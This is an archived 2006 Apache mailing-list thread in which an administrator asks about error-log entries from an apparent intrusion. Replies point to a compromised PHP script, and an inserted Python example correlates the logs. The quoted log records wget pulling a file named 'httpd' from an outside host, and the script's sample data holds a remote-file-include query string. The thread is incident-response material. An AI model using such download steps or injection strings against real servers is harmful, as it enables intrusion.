Posted to users@httpd.apache.org by "James R. Hay" <jr...@haya.qc.ca> on 2006/01/28 21:55:31 UTC

[users@httpd] Origin of error log entries?

Hi folks,

I sent this last night but didn't see it come through and I realize that I 
did not mention that this occurred on a linux server running apache 
1.3.34.

Thanks for any advice or suggestions.

Thanks,
Jim.


James R. Hay				jrhay@HayA.QC.CA
Hay-Net Networks
P.O. Box 46051
Pointe Claire, QC
H9R 5R4

---------- Forwarded message ----------
Date: Sat, 28 Jan 2006 01:38:50 -0500 (EST)
From: James R. Hay <jr...@HayA.QC.CA>
To: users@httpd.apache.org
Subject: Origin of error log entries?


The entries below were found in the Apache error log while investigating an 
apparent exploit.  Thus far I have not found any corresponding access log entry 
and I am wondering if this is an indication that the intruder gained a shell?

httpd(315): Operation not permitted
sh: line 1: fetch: command not found
--00:44:12--  http://members.lycos.co.uk/img00d/httpd
            => `httpd'
Resolving members.lycos.co.uk... done.
Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,662 [text/plain]

     0K .......... .......... ........                        100%   68.00 KB/s

00:44:13 (68.00 KB/s) - `httpd' saved [29662/29662]

php.cgi: no process killed


This begs the question of what is the source of entries for the error log? The 
virtual domains have their own logs and there should be no entries for any 
websites in the main access or error logs.

Any suggestions would be appreciated.

Thanks,
Jim.


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Re: [users@httpd] Origin of error log entries?

Posted by Joshua Slive <jo...@slive.ca>.
On 1/28/06, James R. Hay <jr...@haya.qc.ca> wrote:
>
> Ok, so my intuition that somewhere I should find a corresponding entry in
> an access log for one of the websites is correct, presumably somewhere
> near the time of the timestamp from the error log.

Yes.

> So, this goes more into PHP than Apache but would presumably suggest
> either a script allowing an upload or a query string that was exploited or
> the like.

Yes.

It is most likely an exploit in a standard php application, because
those are much easier to exploit using automated tools.  A problem in
a custom written php script would require more effort to find.  So
check the common problems like phpbb, phpnuke, etc.

Joshua.
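One way to do the correlation Joshua describes, written here as an added example rather than anything from the thread: take the clock time wget wrote to stderr (the `--00:44:12--` line), assume the date of the incident, and list every per-vhost access-log request within a few minutes of it, flagging query strings that carry a remote URL. The log lines, vhost names and the window size are constructed for the example.

```python
import re
from datetime import date, datetime, timedelta

# Constructed sample data (not the poster's real logs): the wget stderr
# lines from the thread, plus combined-format access_log lines from two
# assumed virtual hosts, one of them a remote-include style query string.
ERROR_LOG = """sh: line 1: fetch: command not found
--00:44:12--  http://members.lycos.co.uk/img00d/httpd
php.cgi: no process killed
"""
ACCESS_LOGS = {
    "vhost-a": [
        '10.0.0.5 - - [28/Jan/2006:00:41:02 -0500] "GET /index.php?page=about HTTP/1.1" 200 512',
        '10.0.0.9 - - [28/Jan/2006:00:44:10 -0500] "GET /modules.php?name=http://example.invalid/x.txt HTTP/1.1" 200 77',
    ],
    "vhost-b": [
        '10.0.0.7 - - [28/Jan/2006:00:20:00 -0500] "GET /viewtopic.php?t=12 HTTP/1.1" 200 3000',
    ],
}

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
WGET_TS_RE = re.compile(r"^--(\d{2}:\d{2}:\d{2})--\s+(\S+)")  # wget's "--HH:MM:SS--  URL" line
REMOTE_URL_IN_QUERY = re.compile(r"\?.*https?://", re.IGNORECASE)  # URL inside a query string

def fetch_times(error_log, day):
    """Recover the clock times wget printed to stderr; attach the assumed date."""
    found = []
    for line in error_log.splitlines():
        m = WGET_TS_RE.match(line)
        if m:
            t = datetime.strptime(m.group(1), "%H:%M:%S").time()
            found.append((datetime.combine(day, t), m.group(2)))
    return found

def parse_access(line):
    """Parse one combined/common-format access_log line into a dict, or None."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "target": m.group("target"), "status": int(m.group("status"))}

def correlate(error_log, access_logs, day, window=timedelta(minutes=5)):
    """Requests in any vhost log within `window` of each wget download, flagged if the query carries a URL."""
    hits = []
    for when, url in fetch_times(error_log, day):
        for vhost, lines in access_logs.items():
            for rec in filter(None, map(parse_access, lines)):
                if abs(rec["ts"] - when) <= window:
                    rec.update(vhost=vhost, download=url,
                               remote_include=bool(REMOTE_URL_IN_QUERY.search(rec["target"])))
                    hits.append(rec)
    return hits
```

Run `correlate(ERROR_LOG, ACCESS_LOGS, date(2006, 1, 28))` and inspect the `remote_include` hits first; the wget timestamp is in the server's local time, so the access-log zone offset is dropped before comparing.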



Re: [users@httpd] Origin of error log entries?

Posted by "James R. Hay" <jr...@haya.qc.ca>.
Ok, so my intuition that somewhere I should find a corresponding entry in 
an access log for one of the websites is correct, presumably somewhere 
near the time of the timestamp from the error log.

So, this goes more into PHP than Apache but would presumably suggest 
either a script allowing an upload or a query string that was exploited or 
the like.

Thanks very much.

Jim.

On Sat, 28 Jan 2006, Joshua Slive wrote:

> On 1/28/06, James R. Hay <jr...@haya.qc.ca> wrote:
>> The entries below were found in the Apache error log while investigating an
>> apparent exploit.  Thus far I have not found any corresponding access log entry
>> and I am wondering if this is an indication that the intruder gained a shell?
>
> Close enough.  It is the stderr from a broken script someplace, most
> likely indicating that you have a compromised php script on your
> system.
>
> Joshua.
>




Re: [users@httpd] Origin of error log entries?

Posted by Joshua Slive <jo...@slive.ca>.
On 1/28/06, James R. Hay <jr...@haya.qc.ca> wrote:
> The entries below were found in the Apache error log while investigating an
> apparent exploit.  Thus far I have not found any corresponding access log entry
> and I am wondering if this is an indication that the intruder gained a shell?

Close enough.  It is the stderr from a broken script someplace, most
likely indicating that you have a compromised php script on your
system.

Joshua.
